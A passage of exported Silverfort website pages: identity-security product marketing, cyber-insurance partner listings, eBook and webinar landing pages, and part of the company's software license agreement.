Mitigate Enforce frictionless Just-in-Time (JIT) access policies at scale Remove standing privileges by granting access rights only when necessary. Reduce the risk of overexposure and unnecessary access by enforcing strict privilege limitations and access boundaries. Eliminate the need to deploy complex security controls such as password rotation and vaulting. How Silverfort discovers, classifies and protects privileged accounts. Take a tour of PAS Learn more Explore blog --- - Published: 2024-11-04 - Modified: 2025-04-16 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/the-greco-group/ Silverfort's Cyber Insurance Ecosystem The GrECo Group The GrECo Group, an independent and owner-managed company, is the leading risk consultant & insurance broker for corporations, associations and authorities in CEE. Currently, 67 subsidiaries and approx. 1300 employees in 19 countries, are managed from the company's headquarters in Vienna. Through its global network of insurance specialists, GrECo nova, GrECo is also represented internationally in 150 countries worldwide. How Silverfort and GrECo work together We offer progressive and tailored solutions that meet the individual needs and requirements of our clients. Our goal is to support companies in identifying, assessing and effectively managing their risks. Our team consists of highly qualified professionals who are distinguished by their industry expertise and dedication. We are committed to going beyond to ensure sustainable results for our clients. Together with Silverfort, we can take cyber security to the next level for our clients by providing the right cyber insurance solution at an affordable price. Contact us to get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2024-10-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/how-to-comply-with-the-cyber-insurance-mfa-checklist-thn-hpage-q4/ Everyone knows the value of cyber insurance but keeping up with cyber insurance requirements can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. We’re here to help you make sense of what you’ll need. This eBook explains: What types of MFA are required for cyber liability insurance How to evaluate cyber insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network --- - Published: 2024-10-09 - Modified: 2025-08-01 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/howden/ Silverfort's Cyber Insurance Ecosystem Howden Founded in 1994, Howden is now a leading global insurance group with 18,000 employees, managing $38bn in premiums. Howden offers innovative insurance solutions, creating unique terms and comprehensive concepts like the cyber protection, backed by a network of (external) specialists and a premium support. How Silverfort and Howden work together Silverfort helps Howden to significantly reduce cyber risk for their insureds, allowing for better policy terms and improving the identity security stack. Silverfort is part of Howden’s Cyber+ offering, allowing SMB organizations to quickly and easily get insurance coverage. Contact us to get started Exclusively for Howden clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help Howden clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2024-10-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/ransomware-stoppen-bevor-es-zu-spat-ist-dach-webinar-october-2024/ On-Premises-MFA und Service Accounts im Fokus Ransomware-Angriffe sind keine Frage des "Ob", sondern des "Wann". Erfahren Sie im Webinar, wie Sie durch On-Premises-MFA und Service-Account-Schutz die Ausbreitung von Ransomware effektiv verhindern können. Laterale Bewegungen sind der entscheidende Faktor, der Ransomware-Angriffe von einem einfachen Ärgernis zu einem schwerwiegenden Vorfall auf Unternehmensebene eskalieren lässt. Einst auf Advanced Persistent Threat (APT)-Akteure beschränkt, sind die Techniken der lateralen Bewegung mittlerweile in mehr als 80 % aller globalen Ransomware-Angriffe involviert. Aber was treibt diesen massiven Anstieg der lateralen Bewegung an? Und warum sind die hochentwickelten Sicherheitskontrollen, die heutzutage in vielen Unternehmen implementiert sind, nicht in der Lage, diese Bedrohung zu stoppen? Hören Sie die Antworten darauf in diesem Webinar. Erfahren Sie, wie Sie es besser machen können und die Sicherheitslücken in Ihrem Unternehmen schließen, bevor es zu spät ist! Highlights der Agenda: Wie laterale Bewegung zum kritischsten Risiko für Ihre IT-Umgebung geworden ist. Warum die Erweiterung von MFA und der Schutz von Service-Konten entscheidend sind, um Angreifer daran zu hindern, sich unentdeckt fortzubewegen. Warum identitätsfokussierter Schutz der einzige Weg ist, um laterale Bewegung und die Verbreitung von Ransomware effektiv zu stoppen. --- - Published: 2024-10-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/webinar-on-demand-ransomware-stoppen-bevor-es-zu-spat-ist-dach-october-2024/ Ransomware stoppen, bevor es zu spät ist – On-Premises-MFA und Service Accounts im Fokus --- - Published: 2024-09-30 - Modified: 2024-11-04 - URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-audc-q4/ In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why service accounts are so difficult to protect. Which approaches currently exist to mitigate this risk and their limitations. How to automatically discover, monitor and protect every service account in your environment. --- - Published: 2024-09-30 - Modified: 2024-11-04 - URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-lnk-q4/ In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why service accounts are so difficult to protect. Which approaches currently exist to mitigate this risk and their limitations. How to automatically discover, monitor and protect every service account in your environment. --- - Published: 2024-09-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/identity-first-incident-response/ Identity-first incident response Incident halted. Response accelerated. Block lateral movement, detect and isolate compromised users, and accelerate recovery in Active Directory environments under attack – because in an incident, every second counts. It’s like having a firewall on your domain controllers. Get a demo or Take a tour Our unified platform The missing piece in your IR toolkit. Silverfort integrates seamlessly with IAM systems so you can start the response process by pinpointing and containing compromised accounts. Stop attackers in their tracks, freeze malicious activity and investigate the incident with real-time, actionable telemetry—without killing productivity. Instant containment Flip the script on identity response by instantly isolating malicious presence with MFA and Authentication Firewall policies on all users and resources. Block the attack from spreading with a single click. Effortless detection Let attackers reveal their presence through denied access attempts or blocked MFA challenges. Investigate without disturbing business operations and trace the attacker’s movements back to patient zero. Rapid deployment Get identity-first incident response within hours of deploying our platform – even in the most complex multi-domain environments with hundreds of Domain Controllers. Learn more about our platform The Silverfort Identity Security Platform How it works Start your IR process with identity. Lock down without killing productivity Take action immediately by leveraging the combined power of MFA and Authentication Firewall to stop an attack in its tracks, regardless of lateral movement TTPs or tools. Eliminate the need for lengthy investigations by containing the attack before compromised accounts have been identified. Easily identify compromised accounts Use denied MFA and blocked access attempts to hone in on compromised accounts. Our detailed audit trail can help you trace the attacker’s path back to patient zero, so you can focus your forensic efforts on the affected endpoints. Recover and remediate at your own pace Maintain critical security measures while you restore user access and mitigate any identity-related security weaknesses exploited during the attack, such as shadow admins, unmonitored service accounts, and unconstrained delegation. Take action immediately by leveraging the combined power of MFA and Authentication Firewall to stop an attack in its tracks, regardless of lateral movement TTPs or tools. Eliminate the need for lengthy investigations by containing the attack before compromised accounts have been identified. Use denied MFA and blocked access attempts to hone in on compromised accounts. Our detailed audit trail can help you trace the attacker’s path back to patient zero, so you can focus your forensic efforts on the affected endpoints. Maintain critical security measures while you restore user access and mitigate any identity-related security weaknesses exploited during the attack, such as shadow admins, unmonitored service accounts, and unconstrained delegation. Take a platform tour Free resource Fortifying identity protection: The Silverfort Identity IR Playbook While there’s an established IR playbook to handle the malware and network aspects of cyberattacks, the identity aspect is lacking. There are no common procedures to identify compromised user accounts and prevent attackers from using them to spread within the targeted environment rapidly and efficiently. Our Identity IR playbook fills this gap, combining real-world solutions and tactics with the experiences of multiple customers who have used it to expedite and optimize their IR processes. Step-by-step playbook for IR success From containment to recovery, we cover it all. Zoom in to service accounts and NHIs Get unique insights into your NHIs and how to tackle them in an incident. Flip the script on IR Don't wait for too late. Start the IR process with a complete malicious access lockdown. Get the Playbook here Learn more Explore blog --- - Published: 2024-09-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-journeyteam/ Identify MFA and privileged access protection gaps with JourneyTEAM and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces  Active identity threats that take place in your environment  --- - Published: 2024-09-23 - Modified: 2025-08-21 - URL: https://www.silverfort.com/silverfort-software-license-agreement/ BY CLICKING “I AGREE” OR BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT IDENTITY PROTECTION SOFTWARE PLATFORM, YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE COMPANY YOU REPRESENT (“YOU” OR "LICENSEE") ARE ENTERING INTO A LEGAL AGREEMENT WITH SILVERFORT, INC. ORANY OF ITS WHOLLY OWNED SUBSIDIARIES, INCLUDING SILVERFORT LTD. , SILVERFORT PTE. LTD. OR SILVERFORT GMBH – AS APPLICABLE (“SILVERFORT”), AND HAVE UNDERSTOOD AND AGREE TO COMPLY WITH, AND BE LEGALLY BOUND BY, THE TERMS AND CONDITIONS OF THIS AGREEMENT, AS AMENDED FROM TIME TO TIME ("AGREEMENT"). SILVERFORT AND LICENSEE MAY EACH BE INDIVIDUALLY REFERRED TO HEREIN AS A “PARTY” AND COLLECTIVELY AS THE “PARTIES”. YOU HEREBY WAIVE ANY APPLICABLE RIGHTS TO REQUIRE AN ORIGINAL (NON-ELECTRONIC) SIGNATURE OR DELIVERY OR RETENTION OF NON-ELECTRONIC RECORDS, TO THE EXTENT NOT PROHIBITED UNDER APPLICABLE LAW. IF YOU HAVE ALREADY ENTERED INTO A SEPARATE WRITTEN LICENSE AGREEMENT DIRECTLY WITH SILVERFORT, IN CONNECTION WITH THE ACCESS TO OR USE OF THE SOFTWARE, THEN THIS AGREEMENT SHALL NOT APPLY. SILVERFORT MAY AT ANY TIME UPDATE THIS AGREEMENT BY POSTING AN UPDATED AGREEMENT, WITHIN THE SOFTWARE (“UPDATED AGREEMENT”). ANY UPDATED AGREEMENT WILL BE EFFECTIVE AS OF THE DATE MENTIONED WITHIN SUCH UPDATED AGREEEMENT AND YOUR CONTINUED USE OF THE SOFTWARE WILL CONSTITUTE YOUR CONSENT TO BE BOUND BY THE UPDATED AGREEEMENT. IF YOU HAVE PURCHASED THE LICENSE GRANTED HEREUNDER FROM A PARTNER, RESELLER OR DISTRIBUTOR AUTHORIZED BY SILVERFORT (“PARTNER”), TO THE EXTENT THERE IS ANY CONFLICT BETWEEN THIS AGREEMENT AND THE AGREEMENT ENTERED BETWEEN YOU AND THE RESPECTIVE PARTNER, INCLUDING ANY PURCHASE ORDER (“PARTNER ORDER FORM”), THEN, AS BETWEEN YOU AND SILVERFORT, THIS AGREEMENT SHALL PREVAIL. ANY RIGHTS GRANTED TO YOU IN SUCH PARTNER ORDER FORM WHICH ARE NOT CONTAINED IN THIS AGREEMENT, APPLY ONLY IN CONNECTION WITH SUCH PARTNER. IN THAT CASE, YOU MUST SEEK REDRESS OR REALIZATION OR ENFORCEMENT OF SUCH RIGHTS SOLELY WITH SUCH PARTNER AND NOT SILVERFORT. THE TERMS & CONDITIONS OF THIS AGREEMENT SHALL GOVERN AND REPLACE ANY TERMS & CONDITIONS CONTAINED IN ANY OTHER DOCUMENTS PROVIDED BY LICENSEE. 1. Definitions 1. 1. “Affiliate” means any entity which directly or indirectly controls, is controlled by or is under common control with a Party, where "control" means owning 50% or more of the voting securities of such entity. 1. 2. “Documentation” means any materials that Silverfort provides or makes available to Licensee, which contains instructions on how to utilize the Software. 1. 3. “Licensee Data” means any data or data logs containing identifiable information regarding the activity of Licensee’s individual users (such as usernames, service names or network addresses) within the Software. 1. 4. “Licensee Order Form” means, as applicable, any written or electronic order form (i) issued by Silverfort and agreed to by Licensee or (ii) issued by Licensee in full compliance with and pursuant to a Proposal made by Silverfort to Licensee, each for the provision by Silverfort of a license for the Software and/or the Support Services. 1. 5. “Order Form” means either a Partner Order Form or a Licensee Order Form, as applicable. 1. 6. “Proposal” means any written or electronic price proposal, made by Silverfort to Licensee, setting forth the scope and price of the license for the Software and/or the provision of the Support Services, as applicable. 1. 7. “Protected and Monitored User Accounts” means the Licensee’s user accounts, as well as service accounts, which are audited, analyzed and/or secured by the Software. 1. 8. “Support Services” means any support services provided by Silverfort to Licensee, as set forth in the applicable Order Form. 1. 9. “Software” means Silverfort’s Identity Protection Software Platform, either installed on premises with the Licensee, in machine-readable, object code format only (“On-premise Software”) OR provided in the form of cloud-based software-as-service ("SaaS Software”). The term “Software” shall also include, if applicable, Software Updates. 1. 10. “Software Updates” means any updates, upgrades, modifications, improvements, enhancements, new versions, new releases and corrections to the Software and any derivative works based on the Software, including, in each case, any error corrections, patches and bug fixes. 1. 11. “Usage Data” means any metrics, analytics, statistics, information or data related to the use or operation of the Software, collected or otherwise obtained by Silverfort. 2. License & Subscription 2. 1. Software License & Subscription. Subject to the terms and conditions of this Agreement and the Order Form, Silverfort hereby grants Licensee a non-exclusive, non-sublicensable, non-transferable, revocable license OR revocable subscription (as applicable), for the duration of the Term (as defined below), to use the Software solely in object code format or SaaS form, and forinternal business security purposes only (“License”). The License shall be limited to the maximum number of Protected and Monitored User Accounts specified in the Order Form, which may be assigned to members of either Licensee or Licensee’s Affiliates in accordance with all the terms and conditions of this Agreement. The Software will be deemed accepted upon delivery. 2. 2. Documentation. During the Term, Licensee (and its relevant Affiliates) may use the Documentation solely for Licensee’s internal business security purposes and in connection with Licensee’s use of the Software. 2. 3. Reservation of Rights. Other than the limited rights explicitly granted under this Agreement, Licensee shall have no rights, express or implied, in the Software or the Documentation and all such rights are reserved by Silverfort. 2. 4. Use Restrictions. Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the Software, or any part thereof, or otherwise transfer the Software, or any part thereof, or allow any third party to use the Software, or any part thereof, in any manner; (ii) install or access the Software, or any part thereof, on a server not owned by, under the control of and/or possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the Software’s source code, or any part thereof; (iv) copy (save for a backup copy of the On-premise Software, as may be necessary for its lawful use under and in accordance with this Agreement, the location of which shall always be monitored and subject to the limitations hereunder), modify, revise, enhance or alter the Software, or any part thereof; (v) make the Software, or any part thereof, accessible to other users or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the Software, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the Software, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the Software, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the Software, or any part thereof; (ix) use the Software, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the Software, or any part thereof; (xi) publish or disclose to any third party any: reviews, testing results, information, or the results of any benchmark test of the Software, or any part thereof, without Silverfort’s express prior written consent; (xii) attempt to circumvent or otherwise bypass the maximum number of Protected and Monitored User Accounts set forth in the Order Form; (xiii) transmit or upload through the Software any viruses, trojan horses, worms, time bombs, cancelbots or any other programs with the intent or effect of damaging, destroying, disrupting or otherwise impairing the Software or any other person’s or entity’s data, network, computer system or other equipment; and/or (xiv) solicit, encourage, permit, allow or assist any person to do any of the foregoing. 2. 5. Open-Source Licenses. The Software includes certain open-source code software and materials that are subject to their respective open source licenses. A list of third-party open-source software and related open source licenses will be available on Silverfort’s online customer portal (or similar location) as may be updated from time to time by Silverfort. 2. 6. Software Updates. Silverfort may, from time to time and in its sole discretion, deliver Software Updates to Licensee, provided that such Software Updates will not materially reduce the level of performance, security or availability of the Software. Silverfort shall also update the Documentation to reflect any such Software Updates and make such updated Documentation available to Licensee. For the avoidance of doubt: (i) updates to the SaaS Software will be made automatically by Silverfort, in its sole discretion; (ii) if a Licensee, using the On-Premise Software, does not install Software Updates, Silverfort cannot commit to providing any continued support and/or maintenance to older On-premise Software versions, however, Silverfort will make reasonable efforts to support Software versions which are no more than 6 months older than the most recent version of the On-premise Software. 2. 7. Support Services. Subject to the terms hereunder, Silverfort shall provide Support Services if and as provided in any Order Form only. 3. Licensee Data and Analytics Information 3. 1. The Software may monitor Licensee Data in order to detect and prevent cyber threats. Licensee is the exclusive owner of all Licensee Data. To the extent any Licensee Data is made available to Silverfort, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data, in order to perform Silverfort’s obligations hereunder and under the Order Form (including the provision of the Software and any Software Updates). 3. 2. Licensee represents and warrants that, to the extent Licensee Data includes personally identifiable information (as defined in applicable data privacy laws) (“Personal Data”), Licensee has the appropriate legal bases and required consents and has acted in compliance with all applicable privacy laws and regulations (including the EU’s General Data Protection Regulation (“GDPR”)), as to allow Silverfort to receive (including transfers outside of the European Economic Area), process and use such Licensee Data solely in order to perform Silverfort’s obligations hereunder. In the event a data processing agreement is required under GDPR, the terms of the standard Data Processing Agreement available, at - https://www. silverfort. com/wp-content/uploads/2024/01/Silverfort-DPA-for-Clients-Online-Jan-2024. pdf (“DPA”) shall apply. 3. 3. In the event Licensee fails to comply with any applicable data privacy law or regulation and/or (ii) fails to comply with any provision of the DPA then: (a) to the maximum extent permitted by law, Licensee shall be solely and fully responsible and liable for any such breach, violation, infringement and/or processing of Personal Data by Silverfort or any of Silverfort’s affiliates or subsidiaries (including, without limitation, Silverfort’s employees, officers, directors, subcontractors and agents), and the consequences of any of the foregoing; (b) in the event of any claim of any kind related to any such breach, violation or infringement and/or any claim related to processing of Personal Data, Licensee shall defend, hold harmless and indemnify Silverfort and Silverfort’s affiliates and subsidiaries (including, without limitation, their employees, officers, directors, subcontractors and agents) from and against any and all losses, penalties, fines, damages, liabilities, settlements, costs and expenses, including reasonable attorneys’ fees; and (c) the limitation of Licensee’s liability under Section 11 below shall not apply with respect to paragraphs (a) and (b) above. 4. Software Usage. If requested by Silverfort, Licensee shall disclose the total number of Protected and Monitored User Accounts which utilize the Software, in order to verify that usage of the Software is made in accordance with the terms of the Order Form. 5. Payments. The license granted hereunder and the provision of Support Services, if applicable, are subject to the full payment of the applicable fees due to Silverfort. 6. U. S. Government Use. The Software is a "commercial computer software" and a "commercially available off-the-shelf (COTS) item" as defined under FAR 2. 101, developed entirely at the private expense of Silverfort. If licensed by or on behalf of a US federal, state or local government agency (“Government”), the Government acquires a license to the Software, subject to the terms of this Agreement. This Section is in lieu of and supersedes any other Federal Acquisition Regulation, Department of Defense Federal Acquisition Regulation Supplement or any other clause or provision that addresses government rights in computer software, technical data... --- - Published: 2024-09-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/ The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Get a demo or Take a platform tour Trusted by 1,000+ organizations around the world. Rated 4. 8 on Gartner Peer Insights Where's the gap in your identity defense? Privileged Access Security Non-Human Identity Security Active Directory Service Account Security Extending Multi-Factor Authentication Authentication Firewall Identity Threat Detection and Response AI Agent Security The # 1 attack Surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom ParkerVP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs. " Janusz Wreba-JaworskiCyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William WooGroup CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture. ” Katie McMillanInformation Security Manager | Agilisys Latest blogs Explore our blog --- - Published: 2024-09-04 - Modified: 2024-11-04 - URL: https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook-2/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2024-09-04 - Modified: 2024-11-04 - URL: https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper-2/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/solving-the-top-five-pam-challenges-of-identity-teams-ppc/ PAM solutions aim to address the challenge of protecting privileged accounts – both admin users and service accounts – from compromise. However, there are critical challenges around discovering and protecting admin users that must be overcome to successfully complete the PAM onboarding journey.  Download this eBook to learn: Why only protecting the admins you know leaves critical users exposed to compromise. How service accounts introduce specific visibility and protection challenges to PAM solutions. How a Unified Identity Security platform can accelerate the PAM journey and eliminate its blind spots. --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-ppc/ Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why automating the discovery of service accounts is a must-have. How learning the behavior of each service account is the first step towards real-time protection. How to prevent adversaries from using compromised service accounts for malicious access. --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/re-evaluate-your-mfa-protection-ppc/ MFA protection in AD environments is only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. Download this eBook to learn: Why traditional MFA solutions can’t protect PsExec and PowerShell access. How you can assess your existing MFA protection to better understand your risk exposure. How you can gain end-to-end MFA coverage for all NTLM and Kerberos authentication in your AD environment. --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/eliminating-the-lateral-movement-blind-spot-with-itdr-thn/ Lateral movement is one of the most critical parts of a cyberattack and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity. Explore this eBook to discover the core components of lateral movement attacks and why they’re a blind spot for today’s endpoint, network and PAM products. Topics covered, include: Lateral movement protection checklist How lateral movement employs compromised credentials to spread in a targeted network How Identity Threat Detection and Response (ITDR) mitigates lateral movement attacks by preventing them in real time And more --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/eliminating-the-lateral-movement-blind-spot-with-itdr-thn-li/ Lateral movement is one of the most critical parts of a cyberattack and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity. Explore this eBook to discover the core components of lateral movement attacks and why they’re a blind spot for today’s endpoint, network and PAM products. Topics covered, include: Lateral movement protection checklist How lateral movement employs compromised credentials to spread in a targeted network How Identity Threat Detection and Response (ITDR) mitigates lateral movement attacks by preventing them in real time And more --- - Published: 2024-08-19 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc-aug24/ Can You Block Lateral Movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware with automated propagation. Download this eBook to learn: What are the MFA gaps that ransomware attacks exploit. Why lateral movement is a blind spot for today’s security products. How attackers target privileged accounts to accelerate propagation. How Silverfort’s Unified Identity Protection platform proactively prevents ransomware propagation. --- - Published: 2024-08-12 - Modified: 2025-08-18 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/ Cyber Insurance Silverfort's Insurance Partner Ecosystem We collaborate with leading cyber insurance brokers to assist their clients in meeting stringent policy requirements, such as enforcing MFA on all admin access and securing privileged service accounts. Whether you're a recommending partner, referral partner, or reseller, our program is designed to support brokers in guiding their clients toward enhanced identity security and compliance. Become a partner Explore the ecosystem Browse our cyber insurance partners Arch is an S&P 500 company and leading diversified insurer and reinsurer, providing customised specialty risk solutions to clients worldwide across a wide range of industries. Learn more Beazley Security empowers clients with unparalleled cyber resilience, combining decades of technical expertise with the data-led approach of our parent company, global insurance provider Beazley Insurance. Learn more Crum & Forster (C&F) is a leading national property, casualty, and accident & health insurer, providing specialty insurance products through its admitted and surplus lines insurance companies. Learn more DUAL is one of the world’s largest international underwriting agencies, backed by many of the world’s most highly rated insurance and reinsurance capacity providers. Learn more GrECo is the leading risk consultants and insurance brokers in the CESEE region, providing optimum security for clients’ employee, operational and financial risks. Learn more Howden offers innovative insurance solutions, creating unique terms and comprehensive concepts like the cyber protection, backed by a network of specialists. Learn more The RiskPoint Group is one of Europe’s largest Managing General Underwriters (MGUs) and a Coverholder with Lloyd’s of London, providing best in class insurance solutions to businesses and their advisors globally. Learn more Sompo is a global provider of commercial and consumer property, casualty, and specialty insurance and reinsurance. Sompo employs approximately 9,500 people around the world who use their and expertise to help simplify and resolve your complex challenges. Learn more SÜDVERS is a multi-award-winning global insurance and risk expert for medium-sized businesses and industry, offering tailored solutions for global risk protection. Learn more Willis, a WTW business, is a global leader in advisory, broking and solutions. Their comprehensive cyber risk approach assesses exposures, quantifies potential losses and optimizes risk transfer strategies to help clients protect and grow their businesses effectively. Learn more “As a group, we are dedicated to helping our customers get the most out of their cybersecurity insurance policy, which puts a responsibility on them to reach a certain level of maturity. Silverfort helps our customers achieve this by vastly reducing the identity attack surface, with MFA on all internal resources and protection for Service Accounts, all without having to go through a long and expensive deployment process. This reduces a large swathe of risk that would otherwise lead to successful ransomware attacks, data breaches and significant disruption. ” Shay Simkin Howden Group’s Global Head of Cyber Insurance “With changing market conditions, the cyber resilience of our insured clients is becoming increasingly important for DUAL. Through DUAL Cyber Active Protect and our strategic partnership with Silverfort, we not only provide a sustainable, easily accessible, all-in-one security and insurance package, but also enable insureds to proactively reduce identity-related risks. This includes enterprise-grade protection for service accounts, MFA enforcement across critical systems, and real-time visibility into exposure—all without the complexity of traditional deployments. This partnership allows us to reduce insurance premiums by applying best-in-class underwriting standards and significantly lowering the risk of ransomware and identity-based attacks. ” Ali Khodabakhs Head of DUAL Cyber Europe & Managing Director DUAL CPR “As a group, we are dedicated to helping our customers get the most out of their cybersecurity insurance policy, which puts a responsibility on them to reach a certain level of maturity. Silverfort helps our customers achieve this by vastly reducing the identity attack surface, with MFA on all internal resources and protection for Service Accounts, all without having to go through a long and expensive deployment process. This reduces a large swathe of risk that would otherwise lead to successful ransomware attacks, data breaches and significant disruption. ” Shay Simkin Howden Group’s Global Head of Cyber Insurance “With changing market conditions, the cyber resilience of our insured clients is becoming increasingly important for DUAL. Through DUAL Cyber Active Protect and our strategic partnership with Silverfort, we not only provide a sustainable, easily accessible, all-in-one security and insurance package, but also enable insureds to proactively reduce identity-related risks. This includes enterprise-grade protection for service accounts, MFA enforcement across critical systems, and real-time visibility into exposure—all without the complexity of traditional deployments. This partnership allows us to reduce insurance premiums by applying best-in-class underwriting standards and significantly lowering the risk of ransomware and identity-based attacks. ” Ali Khodabakhs Head of DUAL Cyber Europe & Managing Director DUAL CPR Join this upcoming webinar to discuss the key challenges organizations face in managing identity across hybrid environments. During this session, you will hear:Stories from the trenches from cybersecurity experts including identity specialists, legal experts, and cybersecurity strategy advisors. Discussions on scalable strategies for managing service accounts, securing third-party access, and curbing privilege sprawl. Real-world case studies will highlight credential abuse, automation blind spots, and how Zero Trust architectures are reshaping security across the financial ecosystem. Register here Free guide Cyber Insurance: The complete guide for modern businesses In this guide, you’ll discover:What cyber insurance actually covers — and where its limits are. Why coverage matters now more than ever. Key terms and definitions every decision-maker should understand. Common misconceptions that leave businesses exposed. Practical tips for aligning cyber insurance with your security strategy. Whether you’re a CISO, risk manager, or executive, this article equips you with the knowledge to navigate complex policies, evaluate your readiness, and avoid costly gaps. Read the full guide to gain the insights you need to protect your organization with confidence. Read the guide Learn more about Silverfort and cyber insurance Talk to the team Chat with our experts. In your personal demo, you will learn how Silverfort can help your insureds: Secure their entire IAM infrastructure from within. Discover and protect every dimension of their identity, everywhere. Gain maximum security with minimal effort. Rated 4. 8 on Gartner Peer Insights --- - Published: 2024-08-07 - Modified: 2025-02-23 - URL: https://www.silverfort.com/ea-program/ Join the Silverfort Early Availability Program Shape the Future of Cybersecurity with Silverfort Welcome to the Silverfort Early Availability (EA) Program! We’re excited to offer you the opportunity to be at the forefront of Identity Protection innovation. By joining our EA Program, you’ll gain exclusive early access to our latest features and updates, and play a vital role in shaping the future of our products. Current EA Programs Available Silverfort v. 5. 2 Be the first to experience cutting-edge innovations in identity protection. Join this program to be at the forefront of the latest product features. Privileged Access Security (PAS) PAS will enable organizations to reduce 90% privileged accounts by applying zero standing privileges through easy and scalable access policies. Why join the Silverfort EA Program Early access to cutting-edge features Be the first to experience and test our newest advancements in Identity Protection and stay ahead of emerging threats with the latest tools and updates. Direct feedback loop Share your insights directly with our development team. Influence the design and functionality of Silverfort products to better meet your needs. Exclusive perks Enjoy special benefits, including priority support and access to exclusive content. Receive invitations to webinars, training sessions, and events tailored for our EA community. How to join our Early Availability Program Becoming a part of our EA Program is easy. Simply fill out the registration form to get started. For more information about the Silverfort EA program, please reach out to your Customer Success Manager or message cs@silverfort. com with your details. Join the EA Program --- - Published: 2024-08-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-atg-sf/ Identify MFA and privileged access protection gaps with Alchemy Technology Group and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-08-02 - Modified: 2024-11-04 - URL: 